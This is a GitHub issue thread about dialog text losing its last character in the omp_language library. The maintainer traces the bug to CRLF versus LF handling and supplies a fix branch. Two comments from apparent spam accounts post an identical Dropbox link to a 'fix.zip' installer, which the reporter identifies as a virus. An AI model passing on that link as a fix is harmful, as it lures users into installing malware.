### ISSUE TITLE
Last character on dialogs gets cut off

### ISSUE THREAD

**Issue by itsneufox** [KW46/omp_language#1] opened 2024-08-26 00:38 UTC
As discussed on discord, the last character of text gets cut off except for the last button.

Example:
```
DIALOG_LOGIN_TITLE Account Login
DIALOG_LOGIN_CONTENT Welcome back, %s!\n\nPlease enter your account password in the field below to continue
DIALOG_BUTTON_ENTER ENTER
DIALOG_BUTTON_QUIT EXIT
```
![Screenshot 2024-08-26 012503](https://github.com/user-attachments/assets/1c2e0dd0-a7b7-466d-99c1-4d3321ae6fa2)

but if we add a period after every text, the issue is "fixed":

```
DIALOG_LOGIN_TITLE Account Login.
DIALOG_LOGIN_CONTENT Welcome back, %s!\n\nPlease enter your account password in the field below to continue.
DIALOG_BUTTON_ENTER ENTER.
DIALOG_BUTTON_QUIT EXIT.
```
![Screenshot 2024-08-26 012959](https://github.com/user-attachments/assets/6e2714bc-0e78-42e3-9be2-876b34dd8c78)

Also, i don't know if that's important, but the last button doesn't suffer from this issue because the period still appears.

my code if needed:
```
Dialog_ShowCallback(
            playerid,
            using public DIALOG_LOGIN<iiiis>,
            DIALOG_STYLE_PASSWORD,
            Player_Language_Get(playerid, "user-auth", "DIALOG_LOGIN_TITLE"),
            Player_Language_Get(playerid, "user-auth", "DIALOG_LOGIN_CONTENT", pData[playerid][pName]),
            Player_Language_Get(playerid, "user-auth", "DIALOG_BUTTON_ENTER"),
            Player_Language_Get(playerid, "user-auth", "DIALOG_BUTTON_QUIT")
        );
```

**Comment by seeronline** [comment] 2024-08-26 00:43
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment] 2024-08-26 00:44
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by itsneufox** [comment] 2024-08-26 00:50
Don't download, it's virus. 
![image](https://github.com/user-attachments/assets/c51d8b91-ac57-442f-ba60-c86201c7125e)

**Comment by KW46** [comment] 2024-08-26 04:41
Will look into it (and fix it) as soon as I get home again (which is in a week or so).
I suspect it has to do with CRLF vs LF. Now that I think about it I only tested it on Windows (CRLF by default) and not on Linux (LF by default). (Actually, I did, by cloning original repo, which thus still had files using CRLF - so more accurately, I didn't test with LF files).
This would make sense since 2 characters are stripped and not one (even though the comment says `strip "\n"` it's really `strip "\r\n"`: https://github.com/KW46/omp_language/blob/main/includes/omp_language.inc#L182

**Comment by KW46** [comment] 2024-08-27 13:40
I provided a quick fix for this in https://github.com/KW46/omp_language/tree/1-fix-missing-characters -- I'm currently unable to test properly/extensively so feel free to give it a shot. (If you can confirm it indeed completely works as intended, I'll merge it to main)

**Comment by itsneufox** [comment] 2024-08-27 13:52
i'll test and provide feedback as soon as i can 👍

**Comment by KW46** [comment] 2024-08-27 14:24
Thanks bunches! And if you switch from LF to CRLF?
(I'm pretty sure that'll work fine too as it's an easy fix, however, not planning to merge without confirmation).

**Comment by KW46** [comment] 2024-08-27 14:42
Thanks, that's all I needed to know! `Language_Get()` (and thus also `Player_Language_Get()`) simply fetches a string from the SQLite database, so it doesn't matter if used in dialogs, client messages, textdraws, in printf()/printf() etcetera.

**Closed** 2024-08-27 14:44 UTC
Labels: bug
